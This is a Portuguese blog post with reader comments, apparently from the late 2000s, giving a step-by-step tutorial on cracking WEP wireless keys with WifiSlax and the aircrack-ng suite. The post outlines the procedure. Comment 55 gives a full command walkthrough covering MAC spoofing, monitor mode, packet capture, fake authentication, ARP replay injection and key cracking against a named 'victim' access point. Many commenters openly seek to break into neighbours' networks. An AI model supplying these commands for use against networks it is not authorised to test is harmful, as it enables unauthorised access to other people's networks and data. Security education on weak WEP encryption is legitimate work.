Como quebrar a senha WEP de uma rede wifi – Parte II

A um mês atrás, eu coloquei um post aqui ensinando como quebrar a senha WEP de uma rede sem fio. A notícia era uma compilação de várias fontes da Internet que também ensinavam a quebrar a senha. Entretanto, todos sabem que não é tão simples assim, já que temos que configurar o cartão wireless, instalar os softwares que nem sempre funcionam e claro caputar a quantidade certa de pacotes para decifrar a chave WEP.

Pois bem, como agora estou no meu intensivo para tirar a certificação CWNA (Certified Wireless Network Administrator), que é a certificação mais valorizada em redes sem fio, vou quebrar a senha WEP e fazer um video ensinando passo a passo. Já fiz isso uma vez mas não foi fácil. Agora tentarei mostrar onde todos nós erramos na hora de configurar o ambiente para quebrar a senha.

Atualização:

Quebrar a senha WEP é ao mesmo tempo fácil e difícil porque depende muito do tamanho da chave WEP e do tráfego que tenha a rede. Aqui vão os principais passos para quebrar a senha:

1 – Escolher a placa de rede sem fio adequada. Como vamos utilizar a placa em modo “monitor” ou “promiscuo”, a placa tem que ter a habilidade de capturar pacotes e também de gerar tráfego, o que nem todas fazem. Por isso, aconselho utilizar chipsets Atheros, que permitem fazer tudo. Ultimamente, os notebooks estão vindo com a placa de rede Intel Pro Wireless 3954 a/b/g. Com essa placa, também é possivel quebrar a senha WEP.

2 – O segundo passo é baixar os softwares que serão utilizados. Temos duas opções, baixar separadamente ou usar um kit que já tenha tudo. Eu prefiro utilizar um CD bootável que já vem com tudo pronto. O CD chama WifiSlax, que já vem com AirCrack-ng, Airodump-ng, Kismet e assistência para vários chipsets, que são os softwares utilzados para quebrar a senha.

3 -Dar o boot com o CD WifiSlax e o primeiro que tem que fazer é colocar a placa sem fio em “monitor mode”. Isso pode ser feito através do seguinte comando:

iwconfig “interface” essid any mode Monitor

4 – Uma vez que a placa já esteja em modo promíscuo, abrimos o Kismet para escolher a rede que queremos quebrar a chave WEP. Neste passo você tem que anotar o endereço MAC do ponto de acesso (AP), que também é conhecido como BBSID.

5 – Pronto, agora é rodar o airodump-ng e capturar pacotes. Se a senha WEP for de 64 bits, você vai necessitar de uns 25 mil “data”. Se a chave for de 128, ai 100 mil pacotes serão necessários. Caso a rede escolhida não tenha muito tráfego, você pode utilizar o software airreplay-ng que gera tráfego na rede.

6 – Após capturar esse tráfego, que nem sempre é fácil assim, rodar o aircrack-ng com o arquivo que capturou os pacotes e pimba. Por combinação, ele te mostrará a senha WEP.

Espero que tenha sido útil esse mini tutorial. Se tiverem dúvidas, podem perguntar que já fiz isso várias vezes e realmente funciona.

62 Respostas

  1. queria que me mandasse um email informando quando terá as informações necessárias para quebrar as senha do wireless

  2. Gostaria de saber sobre esse assunto! Tow Fuçanu a rede pra encontrar! Valeu! se quiser me dar uma carona, para aeh pra eu subir! falow!!!

  3. Preciso quebrar a senha wep do meu visinho. Alguém pode me ajudar. Tenho urgência.
    Abraços

  4. E aih quando vai rolar o video???e tem como tbm mostrar como proteger a rede de uma forma “SEGURA”?

  5. queria que me mandasse um email informando quando terá as informações necessárias para quebrar as senha do wireless,
    vc sabe que muita gem vai quere saber para faz coisa que não deve,,,mas como eu gostaria de saber para colocar empratica no dia a dia do serviÇo,gostaria muito de saber ,,abraÇos

  6. Acho que você deveria usar o seu talento e o seu conhecimento para coisas mais úteis e honestas (além de legalmente permitidas).
    Só no Brasil mesmo…

  7. Indignado,

    o que eu vou colocar aqui no blog é uma “receita de bolo” que serve para mostrar a todos porque o WEP não é seguro. Ensinar e mostrar o problema ou a falha de uma tecnologia não é ilegal.

  8. Caro Fábio,
    Já passou pela sua cabeça que, com a sua “inocente receita de bolo”, vários internautas vão poder invadir as redes de seus vizinhos?
    Partindo-se do pressuposto de que, quem comete o crime de invadir a rede do vizinho é capaz de crimes ainda maiores, como por exemplo, obter dados de alguma pasta compartilhada (senhas, endereços, fotos) e, desta forma, causar uma boa dose de grandes problemas a pessoas inocentes?
    Ora, não me venha com eufemismos para um CRIME desta magnitude.
    Use seu tempo e know-how para fazer melhorar a nossa nação infestada de gente desonesta e incompetente.
    O nosso país precisa de pessoas como você para fazer o que é CERTO, LEGAL e HONESTO.
    Você quer alertar as pessoas sobre “problemas de segurança na rede”? ÓTIMO! Mas use o bom senso, ok?
    Indignado

    • Sr. indignado

      Não entendo como entrou neste forum de discusões??? Procurando receita de bolo é que não foi com certeza. Se entrou neste tópco é pq procurava algo sobre este assunto. Vivemos em uma democracia. ENTÃO CUIDA DA SUA VIDA, que cada um aqui cuida da sua.

  9. Indignado,

    estou totalmente de acordo contigo.
    Uma coisa que está bastante clara também é que não é tão fácil assim quebrar a senha WEP e também ter acesso a outros computadores. Para isso, precisa ter um certo conhecimento da tecnologia e principalmente de suas falhas.

    Eu até posso colocar um manual de como quebrar a senha WEP e aposto que 95% das pessoas não vão conseguir, mesmo tendo um manual na frente.

    De qualquer forma, obrigado pelo seus posts.

  10. Fábio,
    Veja um post REALMENTE útil sobre a fragilidade da proteção WEP e quais as opções para melhorar a segurança das redes domésticas.
    A Sra. Barb Bowman consegue fazer o alerta e sugerir correções sem dar NENHUMA RECEITA DE BOLO aos leitores. Quanta sabedoria e elegância, não acha?
    Seja feliz.
    http://www.microsoft.com/brasil/windowsxp/using/networking/expert/bowman_03july28.mspx

  11. Crime??????????
    Axo q soh newbies falam em crime pq hacks consideram conhecimento
    mas….

  12. Olha caras tenho os cursos basicos e avnçados em informatica mas sou um pouco desenrolado queria saber se com esses simples conhecimentos posso não quero somente invadir quero entender como fazer pra tomar um home page e quando estiver dentro tem alguma aparencia ou simplersmente é como o DOS???

  13. tem como me mandar um email com informativo e (ou) video des de já muito obrigado

  14. Caro amigo, voce tem que por o melhor do que vc sabe, não ligue para este que te chamou a atenção. Vai ver que ele tira bala das mãos de criancinhas é o tal falço moralista que só servem para atravancar o progresso dos outros. Derrepente a inveja dele sobre vc que estar se formando em algo que ele por sua incompet~encia nunca vai chegar a algum lugar.
    Abração e estamos esperando seu video que com certeza será um sucesso total.

  15. Pessoal é o seguinte, só respondam, só postem, se for a resposta

    Galera é o seguinte, para quebrar a senha WEP ou WPA tem um programinha 100% em dois minutos você pega… é o AirCrack-ng procurem no google assim: AirCrack download
    é batata, baixe e procure pelo tutorial tb…. é muito fácil de usar… logo postarei explicando isso no meu site, que no momento está fora do ar… http://www.sostenes.com.br Obrigado…

  16. Fabio, vc pagou pela informacao (certificação) .

  17. Caro amigo Fábio,

    Ficaria muito grata se me enviasse este arquivo, pois necessito com urgência… Este procedimento foi solicitado pelo meu orientador na defesa do meu projeto final – Pretendo simular dois cenários e mostrar a vulnerabilidade de um e a seguranço do outro, para isto necessito também o passo a passo, isto para a documentação da monografia!
    Agradeço muitíssimo se me enviar!

    Grande abraço,
    Vanusa

  18. Vanusa;

    Me adicione no msn estou fazendo uma monografia igual a sua.

  19. ola queria quebrar uma senha numa rede sem fio ,sera que vcs poderiam me ajudar,mande um e-mail por favor explicando passa a passo,obrigado gilberto

  20. olá, gostaria que assim q vc conseguir, me manda o link da publicação do vídeo. valeu

  21. QUERO QUEBRAR SENHA E PONTO FINAL….

  22. QUERO quebrar a senha WEP me mande o video ensinando passo a passo como QUEBRAR a SENHA WIRELESS .

  23. Ola pessoal, estou aqui para ajudar a todos, bastam que me adcionem, eu tenho o programa que consegue quebrar a senha de um rede wep…. Bem tenho outra dica para vcs que estão doidos para conectar um rede 0800, hehe olha, se essa rede tem uma configuração pelo MICROTIK podem pesquisar mais, pois o programa que eu tenho apenas quebra a senha wep e não a do MICROTIK.
    Pois estou procurando um Softwere que quebre a senha de um MICROTIK…… espero ter ajudado a todos.
    matt.farell@hotmail.com

  24. oiiii como evadir uma rede sem fio pq na ninha cidade tem uma rede sem fio . ai eu queria pegar net como o note book
    em sem ta per daninha casa .
    tinha como mandar um em e- mail para mi explicando com evadir a rede .. valeu

  25. oi boa pra todos..
    pra começar eu moro num ap.
    e nele tem um cara q tem uma rede sem fio q eu consigo identificar, mas n tenho aceso a ele pois pede uma senha, alguem sabe de alguma forma como eu posso me conectar a essa rede??
    fico grata e abraços pra todos

  26. ae .. tutorial aqui praa quem quiser..

    http://www.inforslash.net

  27. matt.ferall kara c vc conseguir invadir o mikrotik favor me mande e-mail o oq for mas me fala como pls!
    eu ja trabalhei com ele e tenho vontade d descobrir suas falhas
    grato a todos
    =D

  28. matt.ferall kara c vc conseguir invadir o mikrotik favor me mande e-mail o oq for mas me fala como pls!
    eu ja trabalhei com ele e tenho vontade d descobrir suas falhas
    grato a todos
    =D

    ” Se for uma rede a via cabo com swit tem um soft que faz a prucura por ips na rede de nome agry ip iscam tem ele no baixaki….. se vc conseguir e ficar lenta procura por DNS diferente
    que o microtik libera toda a velocidade da rede para vc… caso de duvida me adciona matt.farell@hotmail.com

    espero ter ajudado

  29. GOSTARIA QUE TU PASSASE COMO ENTRAR NA RED SEM FIL, TEM UM AMIGO Q TEM UMA PERTO DE CASA , SO TA PEDINDO SENHA E CONFIRMA SENHA , SERA QUE TU POD ME AJUDAR,
    OBRIGADO

  30. me adciona que te passo o softwere
    matt.ferall@hotmail.com

  31. boa tarde meu amigo tem como vc me enssinar passo a passo por escrito como invadir uma rede wi-fi ? eu tenho na minha rua uma rede wi-fi de um vizinho eu queria saber se tem como me conectar na internet atravéis dessa rede vc pode me enviar um email enssinando passo a passo para que eu entenda obrigado…meu email landrecunha@yahoo.com.br

  32. Me adcione meu caro, que posso tentar te ajudar
    matt.ferall@hotmail.com
    espero que ajudar a todos..

  33. como quebro um codigo de rede wifi com meu celular nokia n95

  34. pow eu tambem queria saber se tem algum jeito de invadir uma red wi fi com um celular…..

  35. Olá, gostei muito do seu post. Agora gostaria muita e seria eternamente grato se você me mandasse um tutorial passo-a-passo de como usar este Sistema Operacional para descobrir a senha de uma rede WiFi com segurança WEP.

    Alex Fernandes.
    alexfernandes8a@gmail.com

  36. amigos eu acho esses artigos espetaculares ,o que nao quer dizer que se eu aprender como se faz tenha que sair poor ai invadidindo as redes dos vizinhos deixem de demagogia conheço muita gente que teeem armas e nao saiem por ai matando os vizinhos …. tenham um bom 2009

  37. gostaria muita e seria eternamente grato se você me mandasse um tutorial passo-a-passo de como usar este Sistema Operacional para descobrir a senha de uma rede WiFi com segurança WEP.

  38. Aos indignados da vida; “Conhecimento não é crime”
    Sou administrador de redes da Unesco. Rede é assim mesmo
    Uns estudam, outros fuçam, e há outros ainda que arrebentam tudo.
    Graças a Deus. Só assim temos emprego.
    Se seu vizinho quer segurança, implemente uma decente. Se puder. Se houver.

  39. Tipo to usanu varios programas so q naum consigu coloca minha placa de rede no modo diferente pra captura os pacotes.Por favor preciso muito disso!!
    alguem me ajuda?

    ADD aw gui_._mota@hotmail.com

  40. Poxa cara, eu qria saber comu faz para deixa a placa em modo monitor?
    pq eu tó mó tempo tentando fazer isso mais nunca consigo
    eu tenho 3 placa uma
    RTL 8185 ..ela eu jah sei q naum consigo tao facil deixa em modo monitor
    2º placa
    TL-WN651G essa é a mesma coisa, da RTL 8185 tbm naum consigo deixa em modo munitor
    3º placa
    é uma D-LINK DWA-510 falarão pra min, q essa placa da pra deixa em modo monitor, + naum consegui :(

  41. Poxa cara, eu qria saber comu faz para deixa a placa em modo monitor?
    pq eu tó mó tempo tentando fazer isso mais nunca consigo
    eu tenho 3 placa uma
    RTL 8185 ..ela eu jah sei q naum consigo tao facil deixa em modo monitor
    2º placa
    TL-WN651G essa é a mesma coisa, da RTL 8185 tbm naum consigo deixa em modo munitor
    3º placa
    é uma D-LINK DWA-510 falarão pra min, q essa placa da pra deixa em modo monitor, + naum consegui :(

    qual quer coisa, manda um email pra min, meu qrido!!

  42. Poxa cara, eu qria saber comu faz para deixa a placa em modo monitor?
    pq eu tó mó tempo tentando fazer isso mais nunca consigo
    eu tenho 3 placa uma
    RTL 8185 ..ela eu jah sei q naum consigo tao facil deixa em modo monitor
    2º placa
    TL-WN651G essa é a mesma coisa, da RTL 8185 tbm naum consigo deixa em modo munitor
    3º placa
    é uma D-LINK DWA-510 falarão pra min, q essa placa da pra deixa em modo monitor, + naum consegui :(

    qual quer coisa, manda um email pra min, meu qrido!!

    trunplis@hotmail.com

  43. ola gostaria de saber se tem algum programa que quebra wep e se roda no windows vista ou so no linux
    eu baixei o aircrack mais nao detecta as redes
    se alguem puder me ajudar agradeço.
    abraço a totos

  44. o conhecimento e pra todos, e a cabeca de cada um, saber o que e certo e errado todos sabem , seguir isso corretamente e q e o problema entao deixe que os culpados paguem por seus erros e nao culpem os que publicaram as informacoes, que cada um use como queira o conhecimento que tem e depois pague por ele caso nao seja correto.O sol nasce pra todos e a sombra pra quem procura, e viva a pirataria, e bom ter coisas caras por um preco mais em conta, se nao o brasileiro nao assistiria filme nao ouviria muisica e taria e bem …… na vida por isso deixe a democracia falar pelo povo e nao fica enchendo com moralismo, que cada um contribua com a sua parte seja ela pro bem ou pro mau, se todos dizem que no final o bem sempre vence, entao que deixe o barco seguir e vamos ver como termina tudo, sou fa da pirataria e sem ela nao teria metade do tenho devo tudo a pirataria e por isso contribuo com ela pq sei que tb ajuda a muitos que nao podem ter o que querem, e que mal tem usar a conexao do vizinho, o que os olhos nao ve o coracao nao sente, num e assim que se falam por ai, entao manda o pau.

  45. Fabio,
    Eu acredito que o conhecimento passado por você nesse site sobre quebrar a senha WEP é muito válido, pois conhecimento nunca é demais. Eu sou um usuário avançado de computadores e gosto muito desses tipo de post. Tenha plena consiencia de que o conhecimento passado é util e que algumas pessoas utilizarão para o bem e outras não. Uma coisa importante para que o indignado saiba é que há uma vasta bibliografia sobre o assunto não somente na internet, mas tambem conteudo vendido em grandes livrarias como eu já tive oportunidade de visualizar.

    Agradeço muito o conhecimento passado.
    R9

  46. Eu preciso de algum placa de rede especial??
    vc sugere alguma mini-pci ou pcmcia??
    obrigado

  47. DESCOBRIR SENHAS WIRELESS – APRENDA COMO FAZER

    O site Apostila Hacker esta disponibilizando um tutorial sobre como descobrir senha wireless, o site demonstra exatamente quais ferramentas (software) utilizar para fazer isso, lembramos a você que a maioria das pessoas não sabem fazer isso por não terem acesso as ferramentas certas, e é isso que o tutorial ira te mostrar.

    Visitem o site para saber mais: apostilahacker.vila.bol.com.br

  48. Aí mano, coloca o vídeo que fica mais fácil pra gente entender. falo man …

    eu man, quando eu fui baixar o wifislax, disse que a página nao estava disponível, e a minha net é bem rápida, vc pode confirmar se o download está funcionando corretamente lá ?

    agradeço.

  49. Caro fabio
    Eu sou um dos defensores da net livre, acredito que as empresas fornecedoras de telecomunicações estão se aproveitando do pessoal, criando preço que nem sempre são acessíveis a todo e não só eles , as empresas discográficas e as cinematográficas ,por isso devemos ter uma palavra a dizer.
    Sou a favor da pirataria, sim, o windows não estaria a onde está se não fossem os piratas.
    Estão sendo criados pelo mundo redes de wireles para as comunidades mais carentes.
    Todos tem direito a informação.
    VCs já se perguntaram quanto ganha um escritor em sua primeira obra?
    Dependendo da editora menos de 5%……

  50. SENHAS – INTERNET SEM FIO

    O site Apostila Hacker esta disponibilizando um material que mostra como descobrir senhas de internet sem fio, o material é muito bom eles mostram quais os programas utilizar e tambem como fazer tudo, lembrando que muita gente não sab fazer por não conhecer os programas, e é isso que eles mostram se interesarem visitem o site:

    http://www.apostilahacker.com.br
    apostilahacker@gmail.com

  51. eu ligo a wireless, e ela capta a rede do vizinho, as vezes ela aparece conectado, mais, aparece os numeros pacote enviado, mais nao de nenhum recebido.e outras vezes aparece rede configuigurado manualmente.
    como faço para cconecta na rede do vizinho.
    se alguem puder me ajudar eu agradeço.
    desde ja.
    obrigado

  52. A maneira mais segura de evitar que alguém quebre a sua senha wireless é não colocar, hehehe.

  53. valew amigo esto muito perto de quebrar a rede wireless voce tem que postar comentario mais fasio porque pra quer quebra wep não fica difisio mas valew

  54. mas se não colocar senha na rede wireless tem o clone amac não adianta vair ser mais fasio para chackers

  55. [Tutorial] Descobrir IP – MAC – WEP – WPA

    ————————————————————————————————-

    Agora vamos quebrar a wep no linux
    que em minha opinião e muito mais fácil do que no Windows, alem do que tem um suporte muito maior a modo monitor, pois muitas placas só entram em modo monitor no linux.

    wifislax 3.1

    ftp://files.tuto-fr.com:8080/distro/wifislax-3.1.iso

    Bom minha placa e uma atheros AR5005G
    Existem varias distros de linux, não vou entrar em detalhes de como instalar os programas, pois iria levar muito tempo, se você tem dificuldade em instalar programas no linux, baixe um live CD de auditoria em redes wifi, eu vou usar o wifislax 3.1

    1 – vamos abrir uma janela do Shell

    Vamos a os comandos, estes comandos são digitados 1 a 1, e sem o #, que no caso seria wifislax#…

    2 – vamos trocar o mac para 00:11:22:33:44:55

    #ifconfig ath0 down
    #ifconfig ath0 hw ether 00:11:22:33:44:55
    #ifconfig ath0 up

    3 – vamos colocar a placa em modo monitor

    #wlanconfig ath0 destroy
    #modprobe -r ath_pci
    #modprobe ath_pci autocreate=monitor

    4 – vamos usar o airodump para capturar os pacotes .ivs para quebrar a wep com o aircrack, e preciso de pelo menos 400 mil pacotes, (este numero pode variar, mas aqui eu precisei disso)

    Legenda do comando usado abaixo

    -W = entrada por nome de pacote
    wep = nome do pacote de captura
    –dssid = mac do ap que você quer quebra a wep
    -c = canas do ap que você quer quebrar a wep
    ath0 = interface da minha placa, eu só tenho placa atheros, ai não sei se varia para outros modelos e marcas

    Comando

    #airodump-ng –ivs -w wep –bssid 00:00:00:00:00 -c 10 ath0

    Ai ira começar a captura, lembrando que aqui eu precisei de 400 mil pacotes,

    5 – você tem como agilizar a captura usando uma autentificação falsa

    Legenda do comando usando abaixo:

    -1 = autentificação falsa
    0 = tempo em segundos da reassociação
    -e = entrado do nome do ap que você vai quebra wep
    -a = mac do ap que você quer quebrar a wep
    -h = mac de um cliente que autenticou lá no airodump

    Comando:

    #aireplay-ng -1 0 -e apvitima -a 00:00:00:00:00 -h 00:00:00:00:00 ath0

    6 – rejeição de arp

    Legenda do comando usado abaixo:

    -3 = repetição padrão do pedido do arp
    -b = mac do ap que você quer quebrar a wep
    -h = mac de um cliente que autenticou la no airodump

    Comando:

    #aireplay-ng -3 -b 00:00:00:00:00 -h 00:00:00:00:00 ath0

    Bom depois de alcançar os 400 pacotes feche o airodump e o aireplay

    7 – agora vamos quebrar a wep com o aircrack

    Abra o sheel

    Legenda do comando usado abaixo:

    -a = força modalidade de ataque
    -1 = wep estática
    -0 = aplica cores no aircrack
    -n = especifica o tamanho da key, sendo de 64,128,256 bits
    Wep-01.ivs = é o pacote que capturamos no airodump , cujo nome posto foi wep, e que por padrão o programa adiciona -01, então se você por exemplo colocou Maria como nome da captura no airodump vai ficar assim, Maria-01.ivs

    Comando

    #aircrack-ng -a 1 -0 -n 64 wep-01.ivs

    Pronto você quebrou a wep no linux

  56. espero ter dado um pouco de nossão valew esse tutorial

  57. Olá, moro num ap e meu visinho tem wireless mas exige senha para conectar, por favor me ensina a descobrir essa senha! Obrigado!

  58. ola amigo,
    gostaria de saber se voce poderia dar uma aula particular sobre o esquema de de descobrir senhas WIFI, e quanto cobraria pela aula.
    no aguardo sidney

Deixe uma resposta